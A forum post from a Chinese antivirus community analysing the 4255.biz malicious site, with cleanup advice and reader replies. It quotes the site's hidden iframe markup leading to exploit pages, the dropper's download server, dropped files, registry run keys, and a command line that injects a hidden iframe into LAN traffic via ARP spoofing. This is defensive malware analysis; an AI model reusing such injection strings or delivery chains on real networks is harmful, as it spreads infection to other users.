瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【原创】关于4255.biz的分析以及查杀的一点建议

12   1  /  2  页   跳转

【原创】关于4255.biz的分析以及查杀的一点建议

【原创】关于4255.biz的分析以及查杀的一点建议

最近很多人中了这个4255.biz的恶意网站
今天在虚拟机里测试了一下
由于本人水平有限 加之测试时间仓促 可能有部分现象没有看到 只能就我看见的内容说一下 并简单的提出查杀建议
如果有疏漏 请广大网友指正
进入4255.biz这个网站之后
可以看到如下代码
<html><TITLE>index</TITLE><BODY><iframe src=http://4255.biz/aaa/bbb/ccc/aaa/001.htm width=50

height=0></iframe> <iframe src=http://4255.biz/aaa/bbb/ccc/bbb/002.htm width=0 height=0></iframe>

<iframe src=http://4255.biz/aaa/bbb/ccc/ccc/003.htm width=0 height=0></iframe> <script

src='http://s19.cnzz.com/stat.php?id=471769&web_id=471769' language='JavaScript'

charset='gb2312'></script></body></html>
http://4255.biz/aaa/bbb/ccc/aaa/001.htm里面有一个利用鼠标漏洞的网马

http://4255.biz/aaa/bbb/ccc/aaa/1.jpg指向http://4255.biz/aaa/bbb/ccc/ddd.exe
002.htm里面是一个加密的MS06-014网马,同样挂了http://4255.biz/aaa/bbb/ccc/ddd.exe

ddd.exe 运行后 释放C:\WINDOWS\system\logo_1.exe

连接218.75.151.159:80 下载1.exe 2.exe 3.exe 8.exe  12.exe 13.exe等木马

3.exe释放C:\WINDOWS\winform.exe和C:\WINDOWS\system32\winform.dll
8.exe释放C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe
12.exe释放C:\WINDOWS\Syswm5\svchost.exe
13.exe 释放C:\WINDOWS\msccrt.exe和C:\WINDOWS\system32\msccrt.dll

过程中还在机器里安装了一个驱动,但是不知道是谁释放的
一个是HKLM\SYSTEM\CurrentControlSet\Services\NPF 指向system32\drivers\npf.sys

还安装了一个嗅叹器
sreng日志里可见
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
  <"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
最重要的就是那个1.exe

他是所有问题之关键
1.exe运行后 启动C:\WINDOWS\system\WPC.DLL(作为一个进程启动?什么意思呢?)
之后由C:\WINDOWS\system\WPC.DLL调用cmd启动 C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\NetMonInstaller.exe
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下添加启动项目

<InternetEx><C:\WINDOWS\system\1.exe>  []
最后这一点是比较重要的
SSM监控的日志如下
父级进程:
  路径: C:\WINDOWS\system\1.exe
  PID: 1844
子级进程:
  路径: C:\WINDOWS\system\CMD.DLL
  命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -reset
父级进程:
  路径: C:\WINDOWS\system\1.exe
  PID: 1844
子级进程:
  路径: C:\WINDOWS\system\CMD.DLL
  命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -port 80 -insert "<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>"
http://w3213.com/ 打开后同样是利用ani漏洞下载那个ddd.exe
应该在这里进行了arp欺骗,局域网中的用户可能会感受到这一点,中毒的机器会不断向局域网内发送数据包,当你访问服务器时,被他截获,然后在其后面插入<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>这段代码 再发送给你
然后其他机器打开IE之后就会被插入上面那段代码 下载那个病毒继续攻击其他机器。
最终导致整个局域网瘫痪。

关于arp欺骗:
 ARP攻击:导致瞬间掉线和大面积断网的罪魁祸首。在局域网中,通过ARP协议来进行IP地址(第三层)与第二层物理地址(即MAC地址)的相互转换。网吧中的一些设备如路由器、装有TCP/IP协议的电脑等都提供ARP缓存表,以提高通信速度。目前很多带有ARP欺骗功能的攻击软件都是利用ARP协议的这个特点来对网络设备进行攻击,通过伪造的MAC与局域网内的IP地址对应,并修改路由器或电脑的ARP缓存表,使得具有合法MAC的电脑无法与IP对应,从而无法通过路由器上网。在掉线重启路由器后,ARP缓存表会刷新,网络会在短时间内恢复正常,待ARP攻击启动后,又出现断网现象,如此反复,很容易被误断为路由器“死机”,从而使得网吧网管员无法及时采取行动迅速恢复网吧的正常营运。
转自 http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1

全过程中增加的文件如下
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe


sreng日志反馈如下
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  <w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe>  []
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <wm><C:\WINDOWS\Syswm5\svchost.exe>  []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  <winform><C:\WINDOWS\winform.exe>  []
    <msccrt><C:\WINDOWS\msccrt.exe>  []
    <InternetEx><C:\WINDOWS\system\1.exe>  []
服务
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
  <"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
驱动程序
[NetGroup Packet Filter Driver / NPF][Running/Manual Start]
  <system32\drivers\npf.sys><NetGroup - Politecnico di Torino>

另外据其他人讲,说那个logo_1.exe还会感染exe
由于我虚拟机里只有一个分区 所以没测试到感染的情况 可能感染其他分区的吧

以上是我观察到的情况  可能有疏漏 而且有些参数也不懂 请广大网友指正
下面就我观察到的情况给出解决方案
建议断网查杀(尤其局域网用户)
对于局域网内中毒的机器:
(查找中毒机器的方法:看交换机上哪个电脑的流量最大,灯狂闪,找到了,打他拨了,再上网试,这时候如果发现所有电脑都上不了网了,或是连路由器也PING不通了,那么就找到这个主机了)摘自http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
处理办法如下
安全模式下(开机后不断 按F8键  然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目  注册表 删除如下项目
  <w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe>  []
    <wm><C:\WINDOWS\Syswm5\svchost.exe>  []
  <winform><C:\WINDOWS\winform.exe>  []
    <msccrt><C:\WINDOWS\msccrt.exe>  []
    <InternetEx><C:\WINDOWS\system\1.exe>  []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Packet Capture Protocol v.0 (experimental) / rpcapd
在“启动项目”-“服务”-“驱动程序”中 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否

NetGroup Packet Filter Driver / NPF
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe
C:\WINDOWS\Syswm5\文件夹
清空临时文件夹
使用反病毒软件 修复被感染的exe

对于局域网内被攻击的用户 即出现打开IE就自动连接到http://w3213.com/或4255.biz下载恶意代码的用户
建议安装Antiarp这个软件

而且务必要打上所有必要的系统补丁 这样即使局域网中有中毒机器 你的机器也不会因为那个利用ani漏洞的jpg 而被成功攻破 成为另一台攻击他人的机器
以上是我对于4255.biz的一点认识 如果有问题 请指正

另外防止这类arp欺骗的方法 请参考http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
最后编辑2007-04-24 14:47:51.653000000
分享到:
gototop
 

顶下。。。沙发!!
gototop
 

通俗易懂!

好家伙

建议置顶

现在木马群真猖狂啊!
gototop
 

没话说了,置顶!!!!!!!!
gototop
 

学习了^-^
gototop
 

不错。。建议置顶。。
gototop
 

如果谁有中此病毒的 按照此方案试一下 然后 说一下结果 谢谢
gototop
 

顶,我们局域网被这个病毒搞死了,狂发ARP攻击....
gototop
 

引用:
【hohel的贴子】顶,我们局域网被这个病毒搞死了,狂发ARP攻击....
………………

有文件感染现象么
gototop
 

阳光,能给个样本吗?
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT